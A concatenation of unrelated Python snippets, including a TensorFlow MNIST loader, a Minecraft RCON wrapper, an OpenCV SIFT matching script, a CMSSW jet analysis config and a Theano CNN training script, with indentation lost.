class NetworkInterface(object):
def __init__(self, name, description, vlan, uplink=False):
self.name = name
self.description = description
self.vlan = vlan
self.uplink = uplink
interface_obj = NetworkInterface("GigabitEthernet0/1","Server Port", 10)
print(template.render(interface=interface_obj))
|
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
import numpy as np
import matplotlib.pyplot as plt
tf.set_random_seed(1)
np.random.seed(1)
BATCH_SIZE = 50
LR = 0.001 # learning rate
mnist = input_data.read_data_sets('./mnist', one_hot=True) # they has been normalized to range (0,1)
test_x = mnist.test.images[:2000]
test_y = mnist.test.labels[:2000]
# plot one example
print(mnist.train.images.shape) # (55000, 28 * 28)
print(mnist.train.labels.shape) # (55000, 10)
print(mnist.train.labels[0].shape)
for i in range(10):
plt.imshow(mnist.train.images[i].reshape((28, 28)), cmap='gray')
plt.title('%i' % np.argmax(mnist.train.labels[i]));
plt.show()
plt.pause(0.1)
# tf_x = tf.placeholder(tf.float32, [None, 28*28]) / 255.
# image = tf.reshape(tf_x, [-1, 28, 28, 1]) # (batch, height, width, channel)
# tf_y = tf.placeholder(tf.int32, [None, 10]) # input y
|
from mcrcon import MCRcon
class Connection:
def __init__(self, address, port, secret):
self.mcr = MCRcon(address, secret)
self.mcr.connect()
def send(self, msg):
resp = self.mcr.command(msg)
return resp
|
class Solution:
def findMedianSortedArrays(self, nums1, nums2):
combined = []
combined.extend(nums1)
combined.extend(nums2)
combined = sorted(combined)
length = len(combined)
if length % 2 != 0:
return combined[length // 2]
else:
return (combined[length // 2-1] + combined[length//2]) / 2
|
from numpy import array
from numpy import mean
import numpy as np
M = array([[1,2,3,4,5,6],[1,2,3,4,5,6]])
#print(M)
col_mean = mean(M, axis=0)
print(col_mean)
row_mean = mean(M, axis=1)
print(row_mean)
all_mean = mean(M)
print(all_mean)
l = [1, 2, 3]
p = [.2, .3, .5]
e = 0
for count, i in enumerate(l):
e += i * p[count]
print(e)
e = np.average(l, weights = p)
print(e)
|
# Copyright (c) Jeremías Casteglione <jrmsdev@gmail.com>
# See LICENSE file.
from _sadm import libdir
from _sadm.service import Service
from _sadm.utils import path
__all__ = ['configure']
def configure(env, cfg):
env.settings.merge(cfg, 'service', (
'config.dir',
'enable',
))
_loadEnabled(env)
def _loadEnabled(env):
fn = 'config.ini'
cfgdir = env.settings.get('service', 'config.dir', fallback = 'service')
for s in env.settings.getlist('service', 'enable'):
env.log("enable %s" % s)
libfn = libdir.fpath('service', s, fn)
libok = _loadConfig(env, libfn)
sfn = env.assets.rootdir(cfgdir, s, fn)
sok = _loadConfig(env, sfn)
if not sok and not libok:
raise env.error("%s file not found" % sfn)
def _loadConfig(env, fn):
ok = False
env.debug("load %s" % fn)
if path.isfile(fn):
Service(fn)
ok = True
else:
env.debug("%s file not found" % fn)
return ok
|
import numpy as np
import cv2 as cv
from matplotlib import pyplot as plt
MIN_MATCH_COUNT = 5
img = cv.imread('C:/Users/Windows/Desktop/Trabalhos/Verso.png',1) # trainImage
marca1 = img[0:57, 0:57]
marca2 = img[0:57, 540:590]
marca3 = img[790:840, 0:57]
marca4 = img[790:840, 540:590]
gray1 = cv.cvtColor(marca1,cv.COLOR_BGR2GRAY)
gray2 = cv.cvtColor(marca2,cv.COLOR_BGR2GRAY)
gray3 = cv.cvtColor(marca3,cv.COLOR_BGR2GRAY)
gray4 = cv.cvtColor(marca4,cv.COLOR_BGR2GRAY)
corners1 = cv.goodFeaturesToTrack(gray1, 1,0.9,10)
corners2 = cv.goodFeaturesToTrack(gray2, 1,0.9,10)
corners3 = cv.goodFeaturesToTrack(gray3, 1,0.9,10)
corners4 = cv.goodFeaturesToTrack(gray4, 1,0.9,10)
corners1 = np.int0(corners1)
corners2 = np.int0(corners2)
corners3 = np.int0(corners3)
corners4 = np.int0(corners4)
for i in corners1:
x,y = i.ravel()
marcat = img[y-10:y+10, x-1:x+19] # queryImage
for f in corners2:
x,y = f.ravel()
marcat2 = img[y-10:y+10, 519+x:539+x] # queryImage
for g in corners3:
x,y = g.ravel()
marcat3 = img[771+y:792+y, x-10:x+10] # queryImage
for h in corners4:
x,y = h.ravel()
marcat4 = img[771+y:792+y, 530+x:550+x] # queryImage
# Initiate SIFT detector
sift = cv.xfeatures2d.SIFT_create()
# find the keypoints and descriptors with SIFT
kp1, des1 = sift.detectAndCompute(marcat,None)
kp2, des2 = sift.detectAndCompute(marca1,None)
FLANN_INDEX_KDTREE = 1
index_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)
search_params = dict(checks = 50)
flann = cv.FlannBasedMatcher(index_params, search_params)
matches = flann.knnMatch(des1,des2,k=2)
# store all the good matches as per Lowe's ratio test.
good = []
for m,n in matches:
if m.distance < 0.7*n.distance:
good.append(m)
if len(good)>MIN_MATCH_COUNT:
src_pts = np.float32([ kp1[m.queryIdx].pt for m in good ]).reshape(-1,1,2)
dst_pts = np.float32([ kp2[m.trainIdx].pt for m in good ]).reshape(-1,1,2)
M, mask = cv.findHomography(src_pts, dst_pts, cv.RANSAC,5.0)
matchesMask = mask.ravel().tolist()
h,w,d = marcat.shape
pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)
dst = cv.perspectiveTransform(pts,M)
img = cv.polylines(img,[np.int32(dst)],True,255,3, cv.LINE_AA)
else:
print( "Not enough matches are found - {}/{}".format(len(good), MIN_MATCH_COUNT) )
matchesMask = None
draw_params = dict(matchColor = (0,255,0), # draw matches in green color
singlePointColor = None,
matchesMask = matchesMask, # draw only inliers
flags = 2)
img3 = cv.drawMatches(marcat,kp1,img,kp2,good,None,**draw_params)
# find the keypoints and descriptors with SIFT
kp3, des3 = sift.detectAndCompute(marcat2,None)
kp4, des4 = sift.detectAndCompute(marca2,None)
matches = flann.knnMatch(des3,des4,k=2)
# store all the good matches as per Lowe's ratio test.
good = []
for m,n in matches:
if m.distance < 0.7*n.distance:
good.append(m)
if len(good)>MIN_MATCH_COUNT:
src_pts2 = np.float32([ kp3[m.queryIdx].pt for m in good ]).reshape(-1,1,2)
dst_pts2 = np.float32([ kp4[m.trainIdx].pt for m in good ]).reshape(-1,1,2)
M2, mask = cv.findHomography(src_pts2, dst_pts2, cv.RANSAC,5.0)
matchesMask = mask.ravel().tolist()
h2,w2,d2 = marcat2.shape
pts2 = np.float32([ [0,0],[0,h2-1],[w2-1,h2-1],[w2-1,0] ]).reshape(-1,1,2)
dst2 = cv.perspectiveTransform(pts2,M2)
img = cv.polylines(img,[np.int32(dst)],True,255,3, cv.LINE_AA)
else:
print( "Not enough matches are found - {}/{}".format(len(good), MIN_MATCH_COUNT) )
matchesMask = None
draw_params = dict(matchColor = (0,255,0), # draw matches in green color
singlePointColor = None,
matchesMask = matchesMask, # draw only inliers
flags = 2)
img4 = cv.drawMatches(marcat2,kp3,img3,kp4,good,None,**draw_params)
# find the keypoints and descriptors with SIFT
kp5, des5 = sift.detectAndCompute(marcat3,None)
kp6, des6 = sift.detectAndCompute(marca3,None)
matches = flann.knnMatch(des5,des6,k=2)
# store all the good matches as per Lowe's ratio test.
good = []
for m,n in matches:
if m.distance < 0.7*n.distance:
good.append(m)
if len(good)>MIN_MATCH_COUNT:
src_pts = np.float32([ kp5[m.queryIdx].pt for m in good ]).reshape(-1,1,2)
dst_pts = np.float32([ kp6[m.trainIdx].pt for m in good ]).reshape(-1,1,2)
M3, mask = cv.findHomography(src_pts, dst_pts, cv.RANSAC,5.0)
matchesMask = mask.ravel().tolist()
h,w,d = marcat.shape
pts3 = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)
dst3 = cv.perspectiveTransform(pts3,M3)
img = cv.polylines(img,[np.int32(dst)],True,255,3, cv.LINE_AA)
else:
print( "Not enough matches are found - {}/{}".format(len(good), MIN_MATCH_COUNT) )
matchesMask = None
draw_params = dict(matchColor = (0,255,0), # draw matches in green color
singlePointColor = None,
matchesMask = matchesMask, # draw only inliers
flags = 2)
img5 = cv.drawMatches(marcat3,kp5,img4,kp6,good,None,**draw_params)
# find the keypoints and descriptors with SIFT
kp7, des7 = sift.detectAndCompute(marcat4,None)
kp8, des8 = sift.detectAndCompute(marca4,None)
matches = flann.knnMatch(des7,des8,k=2)
# store all the good matches as per Lowe's ratio test.
good = []
for m,n in matches:
if m.distance < 0.7*n.distance:
good.append(m)
if len(good)>MIN_MATCH_COUNT:
src_pts = np.float32([ kp7[m.queryIdx].pt for m in good ]).reshape(-1,1,2)
dst_pts = np.float32([ kp8[m.trainIdx].pt for m in good ]).reshape(-1,1,2)
M4, mask = cv.findHomography(src_pts, dst_pts, cv.RANSAC,5.0)
matchesMask = mask.ravel().tolist()
h,w,d = marcat.shape
pts4 = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)
dst4 = cv.perspectiveTransform(pts4,M4)
img = cv.polylines(img,[np.int32(dst)],True,255,3, cv.LINE_AA)
else:
print( "Not enough matches are found - {}/{}".format(len(good), MIN_MATCH_COUNT) )
matchesMask = None
draw_params = dict(matchColor = (0,255,0), # draw matches in green color
singlePointColor = None,
matchesMask = matchesMask, # draw only inliers
flags = 2)
img6 = cv.drawMatches(marcat4,kp7,img5,kp8,good,None,**draw_params)
plt.imshow(img6, 'gray'),plt.show()
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("Ana")
process.load("FWCore.MessageService.MessageLogger_cfi")
############# Set the number of events #############
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1000)
)
############# Define the source file ###############
process.load("JetMETCorrections.MCJet.RelValQCD_cfi")
#process.source = cms.Source("PoolSource",
# fileNames = cms.untracked.vstring('/store/relval/CMSSW_3_4_0_pre2/RelValQCD_FlatPt_15_3000/GEN-SIM-RECO/MC_3XY_V10-v1/0003/D085615A-A5BD-DE11-8897-0026189437E8.root')
#)
############# CaloJets ############################
process.caloMctruthTree = cms.EDAnalyzer("CaloMCTruthTreeProducer",
jets = cms.string('ak4CaloJets'),
genjets = cms.string('ak4GenJets'),
histogramFile = cms.string('ak4CaloMctruthTree.root')
)
############# PFJets ############################
process.pfMctruthTree = cms.EDAnalyzer("PFMCTruthTreeProducer",
jets = cms.string('ak4PFJets'),
genjets = cms.string('ak4GenJets'),
histogramFile = cms.string('ak4PFMctruthTree.root')
)
############# Path ###########################
process.p = cms.Path(process.caloMctruthTree * process.pfMctruthTree)
############# Format MessageLogger #################
process.MessageLogger.cerr.FwkReport.reportEvery = 10
|
# Path to access data
DATA_PATH = './Data/planilha_de_repasse.xlsx'
# Value of used column keys
DATA_KEY_CONCILIATION = 'Conciliação'
DATA_KEY_PAYMENT_WAY = 'Método de pagamento'
DATA_KEY_ML_COMMISSION = 'Comissão ML por parcela'
DATA_KEY_GROSS_AMOUNT = 'Valor bruto da parcela'
DATA_KEY_TRANSACTION_DATE = 'Data da transação'
DATA_KEY_ID_SELLER = 'ID do pedido Seller'
DATA_KEY_COMMISSION = '% Comissão'
DATA_KEY_ANTICIPATION_VALUE = 'Valor da antecipação'
DATA_KEY_NET_VALUE = 'Valor líquido da parcela'
# Ways of payment
PAYMENT_WAY_BOLETO = 'Boleto'
PAYMENT_WAY_CARD = 'Cartão de Crédito'
PAYMENT_WAY_ESTORNO = 'Estorno'
PAYMENT_WAY_TRANSFERENCIA = 'Transferência'
# Reconciliation possibilities
CONCILIATION_OPTION_CONCILIATED = 'Conciliado'
CONCILIATION_OPTION_NOT_CONCILIATED = 'Não Conciliado'
CONCILIATION_OPTION_WITHDRAWAL = 'Retirada'
CONCILIATION_OPTION_MOVEMENT = 'Movimentação'
|
import cPickle
import gzip
import os
import sys
import time
import numpy
import theano
import theano.tensor as T
from theano.tensor.signal import downsample
from theano.tensor.nnet import conv
from logistic_sgd import LogisticRegression, load_data
from mlp import HiddenLayer
from convolutional_mlp import LeNetConvPoolLayer
import argparse
import array
import csv
usage="Usage: < input (.csv/.np/.dat) > <output (.csv/.np/.dat)> < hidden layer (comma sep) > <begin_vec_col> [args]"
parser = argparse.ArgumentParser(
description=__doc__,
fromfile_prefix_chars='@'
)
parser.add_argument('input_file',
metavar='INPUT_FILE',
type=str,
help='input file name (x)')
## structure and parameters of CNN
parser.add_argument(
"--ch",
type=int,
dest="channel",
help="input channel",
default=1)
parser.add_argument(
"--n_class",
dest="n_class",
type=int,
default=2,
help="# of output classes (log-layer)")
parser.add_argument(
"-r",
"--result",
dest="result_filename",
default=None,
help="output result")
parser.add_argument(
"-T",
"--train",
dest="train",
type=int,
default=1,
help="# of training epochs")
parser.add_argument(
"-B",
"--batch",
dest="batch",
type=int,
default=1,
help="batch size")
parser.add_argument(
"-c",
"--comp",
dest="compressed_file",
default=None,
help="compressed output file name")
parser.add_argument(
"--mlp_layer",
dest="mlp_layer",
type=int,
nargs="+",
default=[500],
help="number of MLP layers")
parser.add_argument(
"--pool",
dest="pool",
type=str,
nargs="+",
default=["2,2","2,2"],
help="array of pooling sizes (convolution layer parameters)")
parser.add_argument(
"--filter",
dest="filter",
type=str,
nargs="+",
default=["5,5","5,5"],
help="array of filter sizes (convolution layer parameters)")
parser.add_argument(
"--n_kernel",
dest="n_kernel",
type=int,
nargs="+",
default=[20,50],
help="array of filter sizes (convolution layer parameters)")
parser.add_argument(
"--input_shape",
dest="input_shape",
type=int,
nargs="+",
default=[28,28],
help="input size (convolution layer parameters)")
parser.add_argument(
"--validation_freq",
dest="validation_freq",
type=int,
default=1000,
help="validation frequency to indicate # of iteration")
parser.add_argument(
"--input2",
dest="input2",
type=str,
default=None,
help="second input")
parser.add_argument(
"--mlp_layer2",
dest="mlp_layer2",
type=int,
nargs="+",
default=[500],
help="number of MLP layers")
## file format
parser.add_argument(
"-l",
"--load",
dest="param_file",
help="load parameters file (.dump)")
parser.add_argument(
"--numpy",
action="store_true",
dest="numpy",
help="use numpy file format as input/output/answer-set",
default=False)
parser.add_argument(
"-D",
"--dat",
dest="dat_col",
default="",
help="use dat(binary) file format with indicated columns as input")
parser.add_argument(
"-a",
"--ans",
dest="ans_filename",
help="answer-set file (and enable fine-tuning)",)
parser.add_argument(
"-A",
"--ans_col",
dest="ans_col",
type=int,
nargs="+",
default=None,
help="answer collumn id (csv) (and enable fine-tuning)")
parser.add_argument(
"-s",
"--save",
dest="save_param_filename",
default=None,
help="filename to save parameters")
parser.add_argument(
"-i",
"--ignore",
dest="ignore_col",
type=int,
default=0,
help="")
## parse
args = parser.parse_args()
class CNN(object):
def __init__(self, rng,
x2_size=0,
input_shape=(28,28),
pool_size=[(2,2),(2,2)],
filter_size=[(5,5),(5,5)],
input_tensor=2,
input_channel=1,
nkerns=[20, 50],
n_class=10,
mlp_layer=[500],
mlp_layer2=[500]):
self.rng=rng
self.input_tensor=input_tensor
self.input_channel=input_channel
self.nkerns=nkerns
self.n_class=n_class
self.mlp_layer=mlp_layer
self.mlp_layer2=mlp_layer2
self.var_index = T.lscalar()
self.var_y = T.ivector('y')
self.var_x = self.get_x_var()
self.x2_size = x2_size
print "------------------"
print x2_size
if self.x2_size>0:
self.var_x2 = T.matrix('x2')
else:
self.var_x2 = None
self.input_shape=input_shape
self.pool_size=pool_size
self.filter_size=filter_size
def get_image_shapes(self):
ret=[]
ishape=self.input_shape
ret.append(ishape)
for i in xrange(len(self.filter_size)):
next_ishape0=(ishape[0]-self.filter_size[i][0]+1)/self.pool_size[i][0]
next_ishape1=(ishape[1]-self.filter_size[i][1]+1)/self.pool_size[i][1]
ret.append((next_ishape0,next_ishape1))
ishape=(next_ishape0,next_ishape1)
return ret
def get_vars(self):
return(self.var_index,self.var_x,self.var_y)
def get_x_var(self):
if self.input_tensor==2:
x = T.matrix('x')
elif self.input_tensor==3:
x = T.tensor3('x')
return x
def load(self,params,batch_size):
index,x,y=self.get_vars()
ishape = self.input_shape
ishapes=self.get_image_shapes()
ch=self.input_channel
mlp_layer=self.mlp_layer
######################
# BUILD ACTUAL MODEL #
######################
print '... building the model'
# Reshape matrix of rasterized images of shape (batch_size,28*28)
# to a 4D tensor, compatible with our LeNetConvPoolLayer
cnn_layers=[]
cnn_layer_input = x.reshape((batch_size,self.input_channel, ishapes[0][0], ishapes[0][1]))
for i in xrange(len(self.filter_size)):
filter0=self.filter_size[i]
if i ==0:
ch=self.input_channel
else:
ch=self.nkerns[i-1]
cnn_layer = LeNetConvPoolLayer(self.rng, input=cnn_layer_input,
image_shape=(batch_size, ch, ishapes[i][0], ishapes[i][1]),
W=params['cnn1'][i],
b=params['cnn2'][i],
filter_shape=(self.nkerns[i], ch, filter0[0], filter0[1]),
poolsize=self.pool_size[i])
cnn_layer_input=cnn_layer.output
last_index=len(self.filter_size)
layer_input = cnn_layer_input.flatten(2)
n_layer_input=self.nkerns[last_index-1] * ishapes[last_index][0] * ishapes[last_index][1]
for layer_index in xrange(len(mlp_layer)):
n_out=mlp_layer[layer_index]
lW = theano.shared(params['ws'][layer_index],borrow=True)
lb = theano.shared(params['bs'][layer_index],borrow=True)
layer = HiddenLayer(self.rng, input=layer_input, n_in=n_layer_input,
W=lW,
b=lb,
n_out=n_out, activation=T.tanh)
layer_input=layer.output
n_layer_input=n_out
mlp_output=layer_input
lr_index=len(mlp_layer)
lW = theano.shared(params['ws'][lr_index],borrow=True)
lb = theano.shared(params['bs'][lr_index],borrow=True)
if self.x2_size>0:
layer_input=theano.tensor.concatenate([mlp_output,self.var_x2],axis=1)
lr_layer = LogisticRegression(input=layer_input,
W=lW,
b=lb,
n_in=n_layer_input+self.x2_size,
n_out=self.n_class)
cost = lr_layer.negative_log_likelihood(y)
return(lr_layer.errors, mlp_output,lr_layer.get_y_pred())
else:
lr_layer = LogisticRegression(input=layer_input,
W=lW,
b=lb,
n_in=n_layer_input, n_out=self.n_class)
cost = lr_layer.negative_log_likelihood(y)
return(lr_layer.errors, mlp_output,lr_layer.get_y_pred())
def build(self,batch_size):
# allocate symbolic variables for the data
index,x,y=self.get_vars()
ishape = self.input_shape
ishapes=self.get_image_shapes()
ch=self.input_channel
mlp_layer=self.mlp_layer
mlp_layer2=self.mlp_layer2
######################
# BUILD ACTUAL MODEL #
######################
print '... building the model'
# Reshape matrix of rasterized images of shape (batch_size,28*28)
# to a 4D tensor, compatible with our LeNetConvPoolLayer
cnn_layer_input = x.reshape((batch_size,self.input_channel, ishapes[0][0], ishapes[0][1]))
cnn_params=[]
for i in xrange(len(self.filter_size)):
filter0=self.filter_size[i]
if i ==0:
ch=self.input_channel
else:
ch=self.nkerns[i-1]
cnn_layer = LeNetConvPoolLayer(self.rng, input=cnn_layer_input,
image_shape=(batch_size, ch, ishapes[i][0], ishapes[i][1]),
W=None,
b=None,
filter_shape=(self.nkerns[i], ch, filter0[0], filter0[1]),
poolsize=self.pool_size[i])
cnn_params+=cnn_layer.params
cnn_layer_input=cnn_layer.output
last_index=len(self.filter_size)
layer_input = cnn_layer_input.flatten(2)
n_layer_input=self.nkerns[last_index-1] * ishapes[last_index][0] * ishapes[last_index][1]
mlp_params=[]
for layer_index in xrange(len(mlp_layer)):
n_out=mlp_layer[layer_index]
layer = HiddenLayer(self.rng, input=layer_input, n_in=n_layer_input,
W=None,b=None,
n_out=n_out, activation=T.tanh)
mlp_params+=layer.params
layer_input=layer.output
n_layer_input=n_out
mlp_output=layer_input
if self.x2_size>0:
print self.x2_size
print n_layer_input+self.x2_size,
lr_index=len(mlp_layer)
layer_input=theano.tensor.concatenate([mlp_output,self.var_x2],axis=1)
lr_layer = LogisticRegression(input=layer_input,
W=None,
b=None,
n_in=n_layer_input+self.x2_size,
n_out=self.n_class)
cost = lr_layer.negative_log_likelihood(y)
return(lr_layer.errors, mlp_output, lr_layer.get_y_pred(),cost,cnn_params,mlp_params,lr_layer.params)
else:
lr_index=len(mlp_layer)
lr_layer = LogisticRegression(input=layer_input,
W=None,b=None,
n_in=n_layer_input, n_out=self.n_class)
cost = lr_layer.negative_log_likelihood(y)
return(lr_layer.errors, mlp_output, lr_layer.get_y_pred(),cost,cnn_params,mlp_params,lr_layer.params)
def test_CNN(train_set_x=None,train_set_y=None,
train_set_x2=None,
batch_size=500,param=None,
compress_out=None,
result_filename=None,
cnn=None):
# compute number of minibatches for training, validation and testing
n_train_batches = train_set_x.get_value(borrow=True).shape[0]
n_train_batches /= batch_size
# allocate symbolic variables for the data
# error function
errors,compress,pred = cnn.load(param,batch_size=batch_size)
index,x,y=cnn.get_vars()
x2=cnn.var_x2
if train_set_y!=None:
if train_set_x2==None:
test_model = theano.function([index], errors(y),
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]})
else:
test_model = theano.function([index], errors(y),
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
x2: train_set_x2[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]})
test_losses = [test_model(i) for i in xrange(n_train_batches)]
test_score = numpy.mean(test_losses)
print (('... model %f %%') % (test_score * 100.))
if compress_out!=None:
compress_model = theano.function([index],compress,
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size]})
compressed_data = [compress_model(i).ravel() for i in xrange(n_train_batches)]
numpy.save(compress_out,compressed_data)
print '... saved '+compress_out
# recons
#for da in reversed(sda.dA_layers):
# temp=da.get_reconstructed_input(temp)
if result_filename!=None:
path, ext = os.path.splitext( os.path.basename(result_filename))
if train_set_x2==None:
f=theano.function([index],pred,givens={
x:train_set_x[index*batch_size:(index+1)*batch_size]
})
else:
f=theano.function([index],pred,givens={
x:train_set_x[index*batch_size:(index+1)*batch_size],
x2:train_set_x2[index*batch_size:(index+1)*batch_size]
})
if(ext==".csv" or ext==".txt"):
fp = open(result_filename, 'w')
output = [f(i) for i in xrange(n_train_batches)]
for x in output:
fp.writelines(str(x[0])+"\n")
else:
output = [f(i) for i in xrange(n_train_batches)]
numpy.save(output,result_filename)
return
def learn(learning_rate=0.1, n_epochs=200,
train_set_x=None,
train_set_x2=None,
train_set_y=None,
compress_out=None,
validation_frequency=1000,
batch_size=500,
result_filename=None,
cnn=None):
# compute number of minibatches for training, validation and testing
n_train_batches = train_set_x.get_value(borrow=True).shape[0]
n_train_batches /= batch_size
errors,compress,pred,cost,cnn_params,mlp_params,lr_params = cnn.build(batch_size=batch_size)
params=cnn_params+mlp_params+lr_params
index,x,y=cnn.get_vars()
x2=cnn.var_x2
# error function
if train_set_x2==None:
test_model = theano.function([index], errors(y),
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]})
else:
test_model = theano.function([index], errors(y),
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
x2: train_set_x2[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]})
grads = T.grad(cost, params)
# train_model is a function that updates the model parameters by
# SGD Since this model has many parameters, it would be tedious to
# manually create an update rule for each model parameter. We thus
# create the updates list by automatically looping over all
# (params[i],grads[i]) pairs.
updates = []
for param_i, grad_i in zip(params, grads):
updates.append((param_i, param_i - learning_rate * grad_i))
if train_set_x2==None:
train_model = theano.function([index], cost, updates=updates,
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]})
else:
train_model = theano.function([index], cost, updates=updates,
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
x2: train_set_x2[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]})
###############
# TRAIN MODEL #
###############
print '... training'
patience = 10000 # look as this many examples regardless
patience_increase = 2 # wait this much longer when a new best is found
improvement_threshold = 0.995
#validation_frequency = min(n_train_batches, patience / 2)
best_params = None
best_validation_loss = numpy.inf
best_iter = 0
test_score = 0.
start_time = time.clock()
epoch = 0
while(epoch < n_epochs):
epoch = epoch + 1
for minibatch_index in xrange(n_train_batches):
iter = (epoch - 1) * n_train_batches + minibatch_index
if iter % 100 == 0:
print '... training @ iter = ', iter
cost_ij = train_model(minibatch_index)
if (iter + 1) % validation_frequency == 0:
test_losses = [test_model(i) for i in xrange(n_train_batches)]
test_score = numpy.mean(test_losses)
print (('... epoch %i, minibatch %i/%i, test error of best '
'model %f %%') % \
(epoch, minibatch_index + 1, n_train_batches,
test_score * 100.))
end_time = time.clock()
print('Optimization complete.')
print('Best validation score of %f %% obtained at iteration %i,'\
'with test performance %f %%' %
(best_validation_loss * 100., best_iter + 1, test_score * 100.))
print >> sys.stderr, ('The code for file ' +
os.path.split(__file__)[1] +
' ran for %.2fm' % ((end_time - start_time) / 60.))
#
#
if compress_out!=None:
if train_set_x2==None:
compress_model = theano.function([index], compress,
givens={x: train_set_x[index * batch_size: (index + 1) * batch_size]})
else:
compress_model = theano.function([index], compress,
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
# x2: train_set_x2[index * batch_size: (index + 1) * batch_size],
})
compressed_data = [compress_model(i) for i in xrange(n_train_batches)]
numpy.save(compress_out,compressed_data)
print '... saved '+compress_out
if result_filename!=None:
path, ext = os.path.splitext( os.path.basename(result_filename))
if train_set_x2==None:
f=theano.function([index],pred,givens={x:train_set_x[index*batch_size:(index+1)*batch_size]})
else:
f=theano.function([index],pred,givens={
x:train_set_x[index*batch_size:(index+1)*batch_size],
x2:train_set_x2[index*batch_size:(index+1)*batch_size]})
if(ext==".csv" or ext==".txt"):
fp = open(result_filename, 'w')
output = [f(i) for i in xrange(n_train_batches)]
for x in output:
fp.writelines(str(x[0])+"\n")
else:
output = [f(i) for i in xrange(n_train_batches)]
numpy.save(output,result_filename)
return cnn_params,mlp_params,lr_params
def load_CNN(filename):
fd = open(filename, 'rb')
param=cPickle.load(fd)
#print param
return param
def save_CNN(filename,cnn_params,mlp_params,lr_params):
cnn1=[]
cnn2=[]
for i in range(len(cnn_params)/2):
cnn1.append(cnn_params[i*2].get_value(borrow=True))
cnn2.append(cnn_params[i*2+1].get_value(borrow=True))
ws=[]
bs=[]
for i in range(len(mlp_params)/2):
ws.append(mlp_params[i*2].get_value(borrow=True))
bs.append(mlp_params[i*2+1].get_value(borrow=True))
ws.append(lr_params[0].get_value(borrow=True))
bs.append(lr_params[1].get_value(borrow=True))
params={'ws':ws,'bs':bs,'cnn1':cnn1,'cnn2':cnn2}
fd=open(filename,'wb')
cPickle.dump(params,fd)
if __name__ == '__main__':
vec_col=args.ignore_col
batch_size=args.batch
train_set_x=None
train_set_y=None
shared_y = None
if args.dat_col!="":
print "... reading input data (x) from : "+args.input_file+"(dat)..."
ncols=int(args.dat_col)
train_set_x=load_dat(args.input_file,ncols)
elif args.numpy:
print "... reading input data (x) from : "+args.input_file+"(numpy)..."
temp=numpy.load(args.input_file)
train_set_x=numpy.asarray(temp,dtype=theano.config.floatX)
#print train_set_x
else:
print "... reading input data (x) from : "+args.input_file+"(csv)..."
data=[]
ignore=[]
ans_data=[]
spamReader = csv.reader(open(args.input_file, 'r'), delimiter=',')
ans_col=args.ans_col
for row in spamReader:
r=map(float,row[vec_col:])
if vec_col>0: ignore.append(row[:vec_col])
if ans_col!=None:
if len(ans_col)==1:
ans_data.append(int(row[ans_col[0]]))
else:
ans_data.append([int(row[i]) for i in ans_col])
data.append(r)
train_set_x=data
if ans_col!=None: train_set_y=ans_data
num_data=len(train_set_x)
learning_rate=0.1
borrow=False
n_class=args.n_class
n_train=args.train
pool_size=map(lambda s:map(int,s.split(",")),args.pool)
filter_size=map(lambda s:map(int,s.split(",")),args.filter)
print "# args : " + str(args)
print "# num_data : " + str(num_data)
print "# num_out : " + str(n_class)
print "# train set x : ", len(train_set_x)
print "# pool size : ", str(pool_size)
print "# filter size : ", str(filter_size)
print "# # of kernels : ", str(args.n_kernel)
print "# num_hidden : "+str(args.mlp_layer)
if args.ans_filename!=None:
print "... loading training data (y) from :" + args.ans_filename + "..."
if args.numpy:
train_set_y=numpy.asarray(numpy.load(args.ans_filename),dtype=numpy.int32)
#train_set_y=numpy.asarray(numpy.load(args.ans_filename),dtype=theano.config.floatX)
else:
data=[]
spamReader = csv.reader(open(args.ans_filename, 'r'), delimiter=',')
for row in spamReader:
r=map(float,row)
data.append(r)
train_set_y=data
#train_set_y=numpy.asarray(temp,dtype=theano.config.floatX)
train_set_x=train_set_x[:len(train_set_y)]
print "# train set y : ",len(train_set_y)
shared_y = theano.shared(numpy.asarray(train_set_y,dtype=numpy.int32),borrow=borrow)
num_data=len(train_set_y)
shared_x = theano.shared(numpy.asarray(train_set_x,dtype=theano.config.floatX),borrow=borrow)
if args.input2!=None:
print "... reading input2 data (x) from : "+args.input2+"(numpy)..."
temp=numpy.load(args.input2)
train_set_x2=numpy.asarray(temp,dtype=theano.config.floatX)
shared_x2 = theano.shared(numpy.asarray(train_set_x2,dtype=theano.config.floatX),borrow=borrow)
###
input_tensor=2
if args.channel>1:
input_tensor=3
###
rng = numpy.random.RandomState(23455)
cnn=CNN(
rng=rng,
input_shape=args.input_shape,
input_tensor=input_tensor,
input_channel=args.channel,
nkerns=args.n_kernel,
pool_size=pool_size,
filter_size=filter_size,
mlp_layer=args.mlp_layer,
n_class=args.n_class,
x2_size=shared_x2.get_value(borrow=True).shape[1],
mlp_layer2=args.mlp_layer2
)
print cnn.get_image_shapes()
if args.param_file!=None:
params=load_CNN(args.param_file)
test_CNN(
train_set_x=shared_x,train_set_y=shared_y,
cnn=cnn,
batch_size=1,
param=params,
compress_out=args.compressed_file,
result_filename=args.result_filename,
train_set_x2=shared_x2
)
quit()
cnn_params,mlp_params,lr_params=learn(
learning_rate=learning_rate,
n_epochs=args.train,
cnn=cnn,
validation_frequency=args.validation_freq,
train_set_x=shared_x,
train_set_y=shared_y,
compress_out=args.compressed_file,
batch_size=batch_size,
result_filename=args.result_filename,
train_set_x2=shared_x2
)
